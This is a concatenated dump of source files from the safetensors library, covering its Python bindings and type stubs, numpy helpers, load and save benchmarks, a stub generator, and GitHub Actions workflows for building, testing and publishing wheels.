10 |
11 | Returns:
12 | (`List[str, Dict[str, Dict[str, any]]]`):
13 | The deserialized content is like:
14 | [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)]
15 | """
16 | pass
17 |
18 | @staticmethod
19 | def serialize(tensor_dict, metadata=None):
20 | """
21 | Serializes raw data.
22 |
23 | NOTE: the caller is required to ensure any pointer passed via `data_ptr` is valid and will live
24 | long enough for the duration of the serialization.
25 | We will remove the need for the caller to hold references themselves when we drop support for
26 | python versions prior to 3.11 where the `PyBuffer` API is available.
27 | Creating a `PyBuffer` will enable us to hold a reference to each passed in data array,
28 | increasing its ref count preventing the gc from collecting it while we serialize.
29 |
30 | Args:
31 | tensor_dict (`Dict[str, Dict[Any]]`):
32 | The tensor dict is like:
33 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data_ptr": 1234, "data_len": 24}}
34 | metadata (`Dict[str, str]`, *optional*):
35 | The optional purely text annotations
36 |
37 | Returns:
38 | (`bytes`):
39 | The serialized content.
40 | """
41 | pass
42 |
43 | @staticmethod
44 | def serialize_file(tensor_dict, filename, metadata=None):
45 | """
46 | Serializes raw data into file.
47 |
48 | NOTE: the caller is required to ensure any pointer passed via `data_ptr` is valid and will live
49 | long enough for the duration of the serialization.
50 | We will remove the need for the caller to hold references themselves when we drop support for
51 | python versions prior to 3.11 where the `PyBuffer` API is available.
52 | Creating a `PyBuffer` will enable us to hold a reference to each passed in data array,
53 | increasing its ref count preventing the gc from collecting it while we serialize.
54 |
55 | Args:
56 | tensor_dict (`Dict[str, Dict[Any]]`):
57 | The tensor dict is like:
58 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data_ptr": 1234, "data_len": 24}}
59 | filename (`str`, or `os.PathLike`):
60 | The name of the file to write into.
61 | metadata (`Dict[str, str]`, *optional*):
62 | The optional purely text annotations
63 |
64 | Returns:
65 | (`NoneType`):
66 | On success return None
67 | """
68 | pass
69 |
70 | class safe_open:
71 | """
72 | Opens a safetensors lazily and returns tensors as asked
73 |
74 | Args:
75 | filename (`str`, or `os.PathLike`):
76 | The filename to open
77 |
78 | framework (`str`):
79 | The framework you want you tensors in. Supported values:
80 | `pt`, `tf`, `flax`, `numpy`.
81 |
82 | device (`str`, defaults to `"cpu"`):
83 | The device on which you want the tensors.
84 | """
85 | def __init__(self, filename, framework, device=...):
86 | pass
87 |
88 | def __enter__(self):
89 | """
90 | Start the context manager
91 | """
92 | pass
93 |
94 | def __exit__(self, _exc_type, _exc_value, _traceback):
95 | """
96 | Exits the context manager
97 | """
98 | pass
99 |
100 | def get_slice(self, name):
101 | """
102 | Returns a full slice view object
103 |
104 | Args:
105 | name (`str`):
106 | The name of the tensor you want
107 |
108 | Returns:
109 | (`PySafeSlice`):
110 | A dummy object you can slice into to get a real tensor
111 | Example:
112 | ```python
113 | from safetensors import safe_open
114 |
115 | with safe_open("model.safetensors", framework="pt", device=0) as f:
116 | tensor_part = f.get_slice("embedding")[:, ::8]
117 |
118 | ```
119 | """
120 | pass
121 |
122 | def get_tensor(self, name):
123 | """
124 | Returns a full tensor
125 |
126 | Args:
127 | name (`str`):
128 | The name of the tensor you want
129 |
130 | Returns:
131 | (`Tensor`):
132 | The tensor in the framework you opened the file for.
133 |
134 | Example:
135 | ```python
136 | from safetensors import safe_open
137 |
138 | with safe_open("model.safetensors", framework="pt", device=0) as f:
139 | tensor = f.get_tensor("embedding")
140 |
141 | ```
142 | """
143 | pass
144 |
145 | def keys(self):
146 | """
147 | Returns the names of the tensors in the file.
148 |
149 | Returns:
150 | (`List[str]`):
151 | The name of the tensors contained in that file
152 | """
153 | pass
154 |
155 | def metadata(self):
156 | """
157 | Return the special non tensor information in the header
158 |
159 | Returns:
160 | (`Dict[str, str]`):
161 | The freeform metadata.
162 | """
163 | pass
164 |
165 | def offset_keys(self):
166 | """
167 | Returns the names of the tensors in the file, ordered by offset.
168 |
169 | Returns:
170 | (`List[str]`):
171 | The name of the tensors contained in that file
172 | """
173 | pass
174 |
175 | class SafetensorError(Exception):
176 | """
177 | Custom Python Exception for Safetensor errors.
178 | """
179 |
--------------------------------------------------------------------------------
/.github/workflows/python-release.yml:
--------------------------------------------------------------------------------
1 | # This file is autogenerated by maturin v1.7.4
2 | # To update, run
3 | #
4 | # maturin generate-ci github -m bindings/python/Cargo.toml
5 | #
6 | name: CI
7 |
8 | on:
9 | push:
10 | branches:
11 | - main
12 | - master
13 | tags:
14 | - '*'
15 | pull_request:
16 | workflow_dispatch:
17 |
18 | permissions:
19 | contents: read
20 |
21 | jobs:
22 | linux:
23 | runs-on: ${{ matrix.platform.runner }}
24 | strategy:
25 | matrix:
26 | platform:
27 | - runner: ubuntu-latest
28 | target: x86_64
29 | - runner: ubuntu-latest
30 | target: x86
31 | - runner: ubuntu-latest
32 | target: aarch64
33 | - runner: ubuntu-latest
34 | target: armv7
35 | - runner: ubuntu-latest
36 | target: s390x
37 | - runner: ubuntu-latest
38 | target: ppc64le
39 | steps:
40 | - uses: actions/checkout@v6
41 | - uses: actions/setup-python@v6
42 | with:
43 | python-version: 3.x
44 | - name: Build wheels
45 | uses: PyO3/maturin-action@v1
46 | with:
47 | target: ${{ matrix.platform.target }}
48 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
49 | sccache: 'true'
50 | manylinux: auto
51 | - name: Upload wheels
52 | uses: actions/upload-artifact@v6
53 | with:
54 | name: wheels-linux-${{ matrix.platform.target }}
55 | path: dist
56 |
57 | musllinux:
58 | runs-on: ${{ matrix.platform.runner }}
59 | strategy:
60 | matrix:
61 | platform:
62 | - runner: ubuntu-latest
63 | target: x86_64
64 | - runner: ubuntu-latest
65 | target: x86
66 | - runner: ubuntu-latest
67 | target: aarch64
68 | - runner: ubuntu-latest
69 | target: armv7
70 | steps:
71 | - uses: actions/checkout@v6
72 | - uses: actions/setup-python@v6
73 | with:
74 | python-version: 3.x
75 | - name: Build wheels
76 | uses: PyO3/maturin-action@v1
77 | with:
78 | target: ${{ matrix.platform.target }}
79 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
80 | sccache: 'true'
81 | manylinux: musllinux_1_2
82 | - name: Upload wheels
83 | uses: actions/upload-artifact@v6
84 | with:
85 | name: wheels-musllinux-${{ matrix.platform.target }}
86 | path: dist
87 |
88 | windows:
89 | runs-on: ${{ matrix.platform.runner }}
90 | strategy:
91 | matrix:
92 | platform:
93 | - runner: windows-latest
94 | target: x64
95 | - runner: windows-latest
96 | target: x86
97 | - runner: windows-11-arm
98 | target: arm64
99 | steps:
100 | - uses: actions/checkout@v6
101 | - uses: actions/setup-python@v6
102 | with:
103 | python-version: 3.x
104 | architecture: ${{ matrix.platform.target }}
105 | - name: Build wheels
106 | uses: PyO3/maturin-action@v1
107 | with:
108 | target: ${{ matrix.platform.target == 'arm64' && 'aarch64-pc-windows-msvc' || matrix.platform.target }}
109 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
110 | sccache: 'true'
111 | - name: Upload wheels
112 | uses: actions/upload-artifact@v6
113 | with:
114 | name: wheels-windows-${{ matrix.platform.target }}
115 | path: dist
116 |
117 | macos:
118 | runs-on: ${{ matrix.platform.runner }}
119 | strategy:
120 | matrix:
121 | platform:
122 | - runner: macos-15-intel
123 | target: x86_64
124 | - runner: macos-14
125 | target: aarch64
126 | steps:
127 | - uses: actions/checkout@v6
128 | - uses: actions/setup-python@v6
129 | with:
130 | python-version: 3.x
131 | - name: Build wheels
132 | uses: PyO3/maturin-action@v1
133 | with:
134 | target: ${{ matrix.platform.target }}
135 | args: --release --out dist --manifest-path bindings/python/Cargo.toml
136 | sccache: 'true'
137 | - name: Upload wheels
138 | uses: actions/upload-artifact@v6
139 | with:
140 | name: wheels-macos-${{ matrix.platform.target }}
141 | path: dist
142 |
143 | sdist:
144 | runs-on: ubuntu-latest
145 | steps:
146 | - uses: actions/checkout@v6
147 | - name: Build sdist
148 | uses: PyO3/maturin-action@v1
149 | with:
150 | command: sdist
151 | args: --out dist --manifest-path bindings/python/Cargo.toml
152 | - name: Upload sdist
153 | uses: actions/upload-artifact@v6
154 | with:
155 | name: wheels-sdist
156 | path: dist
157 |
158 | release:
159 | name: Release
160 | runs-on: ubuntu-latest
161 | if: ${{ startsWith(github.ref, 'refs/tags/') || github.event_name == 'workflow_dispatch' }}
162 | needs: [linux, musllinux, windows, macos, sdist]
163 | permissions:
164 | # Use to sign the release artifacts
165 | id-token: write
166 | # Used to upload release artifacts
167 | contents: write
168 | # Used to generate artifact attestation
169 | attestations: write
170 | steps:
171 | - uses: actions/download-artifact@v7
172 | - name: Generate artifact attestation
173 | uses: actions/attest-build-provenance@v3
174 | with:
175 | subject-path: 'wheels-*/*'
176 | - name: Publish to PyPI
177 | if: "startsWith(github.ref, 'refs/tags/')"
178 | uses: PyO3/maturin-action@v1
179 | env:
180 | MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN_DIST}}
181 | with:
182 | command: upload
183 | args: --non-interactive --skip-existing wheels-*/*
184 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/numpy.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | from typing import Dict, List, Optional, Union
4 |
5 | import numpy as np
6 |
7 | from safetensors import deserialize, safe_open, serialize, serialize_file
8 |
9 |
10 | def _flatten(
11 | tensor_dict: Dict[str, np.ndarray], keep_alive_buffer: List
12 | ) -> Dict[str, Dict]:
13 | flattened = {}
14 | for k, v in tensor_dict.items():
15 | tensor = v
16 | if not _is_little_endian(tensor):
17 | tensor = tensor.byteswap(inplace=False)
18 | keep_alive_buffer.append(tensor)
19 | flattened[k] = {
20 | "dtype": tensor.dtype.name,
21 | "shape": tensor.shape,
22 | "data_ptr": tensor.ctypes.data,
23 | "data_len": tensor.nbytes,
24 | }
25 | return flattened
26 |
27 |
28 | def save(
29 | tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]] = None
30 | ) -> bytes:
31 | """
32 | Saves a dictionary of tensors into raw bytes in safetensors format.
33 |
34 | Args:
35 | tensor_dict (`Dict[str, np.ndarray]`):
36 | The incoming tensors. Tensors need to be contiguous and dense.
37 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
38 | Optional text only metadata you might want to save in your header.
39 | For instance it can be useful to specify more about the underlying
40 | tensors. This is purely informative and does not affect tensor loading.
41 |
42 | Returns:
43 | `bytes`: The raw bytes representing the format
44 |
45 | Example:
46 |
47 | ```python
48 | from safetensors.numpy import save
49 | import numpy as np
50 |
51 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))}
52 | byte_data = save(tensors)
53 | ```
54 | """
55 | keep_alive_buffer = [] # to keep byteswapped tensors alive
56 | serialized = serialize(_flatten(tensor_dict, keep_alive_buffer), metadata=metadata)
57 | result = bytes(serialized)
58 | return result
59 |
60 |
61 | def save_file(
62 | tensor_dict: Dict[str, np.ndarray],
63 | filename: Union[str, os.PathLike],
64 | metadata: Optional[Dict[str, str]] = None,
65 | ) -> None:
66 | """
67 | Saves a dictionary of tensors into raw bytes in safetensors format.
68 |
69 | Args:
70 | tensor_dict (`Dict[str, np.ndarray]`):
71 | The incoming tensors. Tensors need to be contiguous and dense.
72 | filename (`str`, or `os.PathLike`)):
73 | The filename we're saving into.
74 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
75 | Optional text only metadata you might want to save in your header.
76 | For instance it can be useful to specify more about the underlying
77 | tensors. This is purely informative and does not affect tensor loading.
78 |
79 | Returns:
80 | `None`
81 |
82 | Example:
83 |
84 | ```python
85 | from safetensors.numpy import save_file
86 | import numpy as np
87 |
88 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))}
89 | save_file(tensors, "model.safetensors")
90 | ```
91 | """
92 | keep_alive_buffer = [] # to keep byteswapped tensors alive
93 | serialize_file(
94 | _flatten(tensor_dict, keep_alive_buffer), filename, metadata=metadata
95 | )
96 |
97 |
98 | def load(data: bytes) -> Dict[str, np.ndarray]:
99 | """
100 | Loads a safetensors file into numpy format from pure bytes.
101 |
102 | Args:
103 | data (`bytes`):
104 | The content of a safetensors file
105 |
106 | Returns:
107 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` on cpu
108 |
109 | Example:
110 |
111 | ```python
112 | from safetensors.numpy import load
113 |
114 | file_path = "./my_folder/bert.safetensors"
115 | with open(file_path, "rb") as f:
116 | data = f.read()
117 |
118 | loaded = load(data)
119 | ```
120 | """
121 | flat = deserialize(data)
122 | return _view2np(flat)
123 |
124 |
125 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]:
126 | """
127 | Loads a safetensors file into numpy format.
128 |
129 | Args:
130 | filename (`str`, or `os.PathLike`)):
131 | The name of the file which contains the tensors
132 |
133 | Returns:
134 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray`
135 |
136 | Example:
137 |
138 | ```python
139 | from safetensors.numpy import load_file
140 |
141 | file_path = "./my_folder/bert.safetensors"
142 | loaded = load_file(file_path)
143 | ```
144 | """
145 | result = {}
146 | with safe_open(filename, framework="np") as f:
147 | for k in f.offset_keys():
148 | result[k] = f.get_tensor(k)
149 | return result
150 |
151 |
152 | _TYPES = {
153 | "F64": np.float64,
154 | "F32": np.float32,
155 | "F16": np.float16,
156 | "I64": np.int64,
157 | "U64": np.uint64,
158 | "I32": np.int32,
159 | "U32": np.uint32,
160 | "I16": np.int16,
161 | "U16": np.uint16,
162 | "I8": np.int8,
163 | "U8": np.uint8,
164 | "BOOL": bool,
165 | "C64": np.complex64,
166 | }
167 |
168 |
169 | def _getdtype(dtype_str: str) -> np.dtype:
170 | return _TYPES[dtype_str]
171 |
172 |
173 | def _view2np(safeview) -> Dict[str, np.ndarray]:
174 | result = {}
175 | for k, v in safeview:
176 | dtype = _getdtype(v["dtype"])
177 | arr = np.frombuffer(v["data"], dtype=dtype).reshape(v["shape"])
178 | result[k] = arr
179 | return result
180 |
181 |
182 | def _is_little_endian(tensor: np.ndarray) -> bool:
183 | byteorder = tensor.dtype.byteorder
184 | if byteorder == "=":
185 | if sys.byteorder == "little":
186 | return True
187 | else:
188 | return False
189 | elif byteorder == "|":
190 | return True
191 | elif byteorder == "<":
192 | return True
193 | elif byteorder == ">":
194 | return False
195 | raise ValueError(f"Unexpected byte order {byteorder}")
196 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_pt.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import pytest
5 | import torch
6 |
7 | from safetensors.torch import load_file, save_file
8 |
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = torch.zeros((50257, 768))
13 | tensors["wpe"] = torch.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = torch.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = torch.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = torch.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = torch.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = torch.zeros((2304))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = torch.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = torch.zeros((768))
22 | tensors[f"h.{i}.ln_2.weight"] = torch.zeros((768))
23 | tensors[f"h.{i}.ln_2.bias"] = torch.zeros((768))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = torch.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = torch.zeros((3072))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = torch.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = torch.zeros((768))
28 | tensors["ln_f.weight"] = torch.zeros((768))
29 | tensors["ln_f.bias"] = torch.zeros((768))
30 | return tensors
31 |
32 |
33 | def create_lora(n_layers: int):
34 | tensors = {}
35 | for i in range(n_layers):
36 | tensors[f"lora.{i}.up.weight"] = torch.zeros((32, 32))
37 | tensors[f"lora.{i}.down.weight"] = torch.zeros((32, 32))
38 | return tensors
39 |
40 |
41 | def test_pt_pt_load_cpu(benchmark):
42 | # benchmark something
43 | weights = create_gpt2(12)
44 | with tempfile.NamedTemporaryFile(delete=False) as f:
45 | torch.save(weights, f)
46 | result = benchmark(torch.load, f.name)
47 | os.unlink(f.name)
48 |
49 | for k, v in weights.items():
50 | tv = result[k]
51 | assert torch.allclose(v, tv)
52 |
53 |
54 | def test_pt_sf_load_cpu(benchmark):
55 | # benchmark something
56 | weights = create_gpt2(12)
57 | with tempfile.NamedTemporaryFile(delete=False) as f:
58 | save_file(weights, f.name)
59 | result = benchmark(load_file, f.name)
60 | os.unlink(f.name)
61 |
62 | for k, v in weights.items():
63 | tv = result[k]
64 | assert torch.allclose(v, tv)
65 |
66 |
67 | def test_pt_pt_load_cpu_small(benchmark):
68 | weights = create_lora(500)
69 | with tempfile.NamedTemporaryFile(delete=False) as f:
70 | torch.save(weights, f)
71 | result = benchmark(torch.load, f.name)
72 | os.unlink(f.name)
73 |
74 | for k, v in weights.items():
75 | tv = result[k]
76 | assert torch.allclose(v, tv)
77 |
78 |
79 | def test_pt_sf_load_cpu_small(benchmark):
80 | weights = create_lora(500)
81 |
82 | with tempfile.NamedTemporaryFile(delete=False) as f:
83 | save_file(weights, f.name)
84 | result = benchmark(load_file, f.name)
85 | os.unlink(f.name)
86 |
87 | for k, v in weights.items():
88 | tv = result[k]
89 | assert torch.allclose(v, tv)
90 |
91 |
92 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda")
93 | def test_pt_pt_load_gpu(benchmark):
94 | # benchmark something
95 | weights = create_gpt2(12)
96 | with tempfile.NamedTemporaryFile(delete=False) as f:
97 | torch.save(weights, f)
98 | result = benchmark(torch.load, f.name, map_location="cuda:0")
99 | os.unlink(f.name)
100 |
101 | for k, v in weights.items():
102 | v = v.cuda()
103 | tv = result[k]
104 | assert torch.allclose(v, tv)
105 |
106 |
107 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda")
108 | def test_pt_sf_load_gpu(benchmark):
109 | # benchmark something
110 | weights = create_gpt2(12)
111 | with tempfile.NamedTemporaryFile(delete=False) as f:
112 | save_file(weights, f.name)
113 | result = benchmark(load_file, f.name, device="cuda:0")
114 | os.unlink(f.name)
115 |
116 | for k, v in weights.items():
117 | v = v.cuda()
118 | tv = result[k]
119 | assert torch.allclose(v, tv)
120 |
121 |
122 | @pytest.mark.skipif(
123 | not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(),
124 | reason="requires mps",
125 | )
126 | def test_pt_pt_load_mps(benchmark):
127 | # benchmark something
128 | weights = create_gpt2(12)
129 | with tempfile.NamedTemporaryFile(delete=False) as f:
130 | torch.save(weights, f)
131 | result = benchmark(torch.load, f.name, map_location="mps")
132 | os.unlink(f.name)
133 |
134 | for k, v in weights.items():
135 | v = v.to(device="mps")
136 | tv = result[k]
137 | assert torch.allclose(v, tv)
138 |
139 |
140 | @pytest.mark.skipif(
141 | not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(),
142 | reason="requires mps",
143 | )
144 | def test_pt_sf_load_mps(benchmark):
145 | # benchmark something
146 | weights = create_gpt2(12)
147 | with tempfile.NamedTemporaryFile(delete=False) as f:
148 | save_file(weights, f.name)
149 | result = benchmark(load_file, f.name, device="mps")
150 | os.unlink(f.name)
151 |
152 | for k, v in weights.items():
153 | v = v.to(device="mps")
154 | tv = result[k]
155 | assert torch.allclose(v, tv)
156 |
157 |
158 | def test_pt_sf_save_cpu(benchmark):
159 | weights = create_gpt2(12)
160 |
161 | filename = "tmp.safetensors"
162 |
163 | # XXX: On some platforms (tested on Linux x86_64 ext4), writing to an already existing file is slower than creating a new one.
164 | # On others, such as MacOS (APFS), it's the opposite. To have more consistent benchmarks,
165 | # we ensure the file does not exist before each write, which is also closer to real world usage.
166 | def setup():
167 | try:
168 | os.unlink(filename)
169 | except Exception:
170 | pass
171 |
172 | benchmark.pedantic(
173 | save_file, args=(weights, filename), setup=setup, iterations=1, rounds=5
174 | )
175 |
176 | # Clean up files
177 | os.unlink(filename)
178 |
--------------------------------------------------------------------------------
/bindings/python/stub.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | import inspect
3 | import os
4 | import subprocess
5 | import tempfile
6 |
7 | INDENT = " " * 4
8 | GENERATED_COMMENT = "# Generated content DO NOT EDIT\n"
9 |
10 |
11 | def do_indent(text: str, indent: str):
12 | return text.replace("\n", f"\n{indent}")
13 |
14 |
15 | def function(obj, indent, text_signature=None):
16 | if text_signature is None:
17 | text_signature = obj.__text_signature__
18 | string = ""
19 | string += f"{indent}def {obj.__name__}{text_signature}:\n"
20 | indent += INDENT
21 | string += f'{indent}"""\n'
22 | string += f"{indent}{do_indent(obj.__doc__, indent)}\n"
23 | string += f'{indent}"""\n'
24 | string += f"{indent}pass\n"
25 | string += "\n"
26 | string += "\n"
27 | return string
28 |
29 |
30 | def member_sort(member):
31 | if inspect.isclass(member):
32 | value = 10 + len(inspect.getmro(member))
33 | else:
34 | value = 1
35 | return value
36 |
37 |
38 | def fn_predicate(obj):
39 | value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj)
40 | if value:
41 | return (
42 | obj.__doc__
43 | and obj.__text_signature__
44 | and (
45 | not obj.__name__.startswith("_")
46 | or obj.__name__ in {"__enter__", "__exit__"}
47 | )
48 | )
49 | if inspect.isgetsetdescriptor(obj):
50 | return obj.__doc__ and not obj.__name__.startswith("_")
51 | return False
52 |
53 |
54 | def get_module_members(module):
55 | members = [
56 | member
57 | for name, member in inspect.getmembers(module)
58 | if not name.startswith("_") and not inspect.ismodule(member)
59 | ]
60 | members.sort(key=member_sort)
61 | return members
62 |
63 |
64 | def pyi_file(obj, indent=""):
65 | string = ""
66 | if inspect.ismodule(obj):
67 | string += GENERATED_COMMENT
68 | members = get_module_members(obj)
69 | for member in members:
70 | string += pyi_file(member, indent)
71 |
72 | elif inspect.isclass(obj):
73 | indent += INDENT
74 | mro = inspect.getmro(obj)
75 | if len(mro) > 2:
76 | inherit = f"({mro[1].__name__})"
77 | else:
78 | inherit = ""
79 | string += f"class {obj.__name__}{inherit}:\n"
80 |
81 | body = ""
82 | if obj.__doc__:
83 | body += (
84 | f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n'
85 | )
86 |
87 | fns = inspect.getmembers(obj, fn_predicate)
88 |
89 | # Init
90 | if obj.__text_signature__:
91 | signature = obj.__text_signature__.replace("(", "(self, ")
92 | body += f"{indent}def __init__{signature}:\n"
93 | body += f"{indent + INDENT}pass\n"
94 | body += "\n"
95 |
96 | for name, fn in fns:
97 | body += pyi_file(fn, indent=indent)
98 |
99 | if not body:
100 | body += f"{indent}pass\n"
101 |
102 | string += body
103 | string += "\n\n"
104 |
105 | elif inspect.isbuiltin(obj):
106 | string += f"{indent}@staticmethod\n"
107 | string += function(obj, indent)
108 |
109 | elif inspect.ismethoddescriptor(obj):
110 | string += function(obj, indent)
111 |
112 | elif inspect.isgetsetdescriptor(obj):
113 | # TODO it would be interesing to add the setter maybe ?
114 | string += f"{indent}@property\n"
115 | string += function(obj, indent, text_signature="(self)")
116 | else:
117 | raise Exception(f"Object {obj} is not supported")
118 | return string
119 |
120 |
121 | def py_file(module, origin):
122 | members = get_module_members(module)
123 |
124 | string = GENERATED_COMMENT
125 | string += f"from .. import {origin}\n"
126 | string += "\n"
127 | for member in members:
128 | name = member.__name__
129 | string += f"{name} = {origin}.{name}\n"
130 | return string
131 |
132 |
133 | def do_black(content):
134 | content = content.replace("$self", "self")
135 | with tempfile.NamedTemporaryFile(mode="w+", suffix=".pyi") as f:
136 | f.write(content)
137 | f.flush()
138 | _ = subprocess.check_output(["ruff", "format", f.name])
139 | f.seek(0)
140 | new_content = f.read()
141 | return new_content
142 |
143 |
144 | def write(module, directory, origin, check=False):
145 | submodules = [
146 | (name, member)
147 | for name, member in inspect.getmembers(module)
148 | if inspect.ismodule(member)
149 | ]
150 |
151 | filename = os.path.join(directory, "__init__.pyi")
152 | pyi_content = pyi_file(module)
153 | pyi_content = do_black(pyi_content)
154 | os.makedirs(directory, exist_ok=True)
155 | if check:
156 | with open(filename, "r") as f:
157 | data = f.read()
158 | assert data == pyi_content, (
159 | f"The content of {filename} seems outdated, please run `python stub.py`"
160 | )
161 | else:
162 | with open(filename, "w") as f:
163 | f.write(pyi_content)
164 |
165 | filename = os.path.join(directory, "__init__.py")
166 | py_content = py_file(module, origin)
167 | py_content = do_black(py_content)
168 | os.makedirs(directory, exist_ok=True)
169 |
170 | is_auto = False
171 | if not os.path.exists(filename):
172 | is_auto = True
173 | else:
174 | with open(filename, "r") as f:
175 | line = f.readline()
176 | if line == GENERATED_COMMENT:
177 | is_auto = True
178 |
179 | if is_auto:
180 | if check:
181 | with open(filename, "r") as f:
182 | data = f.read()
183 | assert data == py_content, (
184 | f"The content of {filename} seems outdated, please run `python stub.py`"
185 | )
186 | else:
187 | with open(filename, "w") as f:
188 | f.write(py_content)
189 |
190 | for name, submodule in submodules:
191 | write(submodule, os.path.join(directory, name), f"{name}", check=check)
192 |
193 |
194 | if __name__ == "__main__":
195 | parser = argparse.ArgumentParser()
196 | parser.add_argument("--check", action="store_true")
197 |
198 | args = parser.parse_args()
199 | import safetensors
200 |
201 | write(
202 | safetensors._safetensors_rust,
203 | "py_src/safetensors/",
204 | "safetensors",
205 | check=args.check,
206 | )
207 |
--------------------------------------------------------------------------------
/.github/workflows/python.yml:
--------------------------------------------------------------------------------
1 | name: Python
2 |
3 | on:
4 | pull_request:
5 |
6 | jobs:
7 | build_and_test:
8 | name: Check everything builds & tests
9 | runs-on: ${{ matrix.os }}
10 | strategy:
11 | matrix:
12 | os: [ubuntu-latest, windows-latest]
13 | # Lowest and highest, no version specified so that
14 | # new releases get automatically tested against
15 | version: [{torch: torch==1.10, python: "3.9", arch: "x64", numpy: numpy==1.26.4}, {torch: torch, python: "3.12", arch: "x64", numpy: numpy}]
16 | # TODO this would include macos ARM target.
17 | # however jax has an illegal instruction issue
18 | # that exists only in CI (probably difference in instruction support).
19 | # include:
20 | # - os: macos-latest
21 | # version:
22 | # torch: torch
23 | # python: "3.11"
24 | include:
25 | - os: ubuntu-latest
26 | version:
27 | torch: torch
28 | python: "3.13"
29 | numpy: numpy
30 | arch: "x64-freethreaded"
31 | - os: macos-15-intel
32 | version:
33 | torch: torch==1.10
34 | numpy: "numpy==1.26"
35 | python: "3.9"
36 | arch: "x64"
37 | - os: macos-latest
38 | version:
39 | torch: torch
40 | python: "3.12"
41 | numpy: numpy
42 | arch: "arm64"
43 | - os: windows-11-arm
44 | version:
45 | torch: torch
46 | python: "3.12"
47 | numpy: numpy
48 | arch: "arm64"
49 | defaults:
50 | run:
51 | working-directory: ./bindings/python
52 | steps:
53 | - name: Checkout repository
54 | uses: actions/checkout@v6
55 |
56 | - name: Install Rust
57 | uses: dtolnay/rust-toolchain@stable
58 | with:
59 | components: rustfmt, clippy
60 |
61 | - name: Cargo install audit
62 | run: cargo install cargo-audit
63 |
64 | - uses: Swatinem/rust-cache@v2
65 | with:
66 | workspaces: "bindings/python"
67 |
68 | - name: Install Python
69 | uses: actions/setup-python@v6
70 | with:
71 | python-version: ${{ matrix.version.python }}
72 | architecture: ${{ matrix.version.arch }}
73 |
74 | - name: Lint with RustFmt
75 | run: cargo fmt -- --check
76 |
77 | - name: Lint with Clippy
78 | run: cargo clippy --all-targets --all-features -- -D warnings
79 |
80 | - name: Run Audit
81 | run: cargo audit -D warnings
82 |
83 | # - name: Install
84 | # run: |
85 | # pip install -U pip
86 |
87 | - name: Install (torch)
88 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm'
89 | run: |
90 | pip install ${{ matrix.version.numpy }}
91 | pip install ${{ matrix.version.torch }}
92 | shell: bash
93 |
94 | - name: Install (torch freethreaded)
95 | if: matrix.version.arch == 'x64-freethreaded'
96 | run: |
97 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cu126
98 | shell: bash
99 |
100 | - name: Install (torch windows arm64)
101 | if: matrix.os == 'windows-11-arm'
102 | run: |
103 | pip install ${{ matrix.version.numpy }}
104 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cpu
105 | shell: bash
106 |
107 | - name: Install (hdf5 non windows)
108 | if: matrix.os == 'ubuntu-latest' && matrix.version.arch != 'x64-freethreaded'
109 | run: |
110 | sudo apt-get update
111 | sudo apt-get install libhdf5-dev
112 |
113 | - name: Install (tensorflow)
114 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm'
115 | run: |
116 | pip install .[tensorflow]
117 | # Force reinstall of numpy, tensorflow uses numpy 2 even on 3.9
118 | pip install ${{ matrix.version.numpy }}
119 | shell: bash
120 |
121 | - name: Install (jax, flax)
122 | if: runner.os != 'Windows' && matrix.version.arch != 'x64-freethreaded'
123 | run:
124 | pip install .[jax]
125 | shell: bash
126 |
127 | - name: Install (mlx)
128 | if: matrix.os == 'macos-latest'
129 | run: |
130 | pip install .[mlx]
131 | shell: bash
132 |
133 | - name: Check style
134 | run: |
135 | pip install .[quality]
136 | ruff format --check .
137 |
138 | - name: Run tests
139 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm'
140 | run: |
141 | cargo test
142 | pip install ".[testing]"
143 | pytest -sv tests/
144 |
145 | - name: Run tests (Windows arm64)
146 | if: matrix.os == 'windows-11-arm'
147 | run: |
148 | cargo test
149 | pip install ".[testing]"
150 | pytest -sv tests/ --ignore=tests/test_tf_comparison.py
151 |
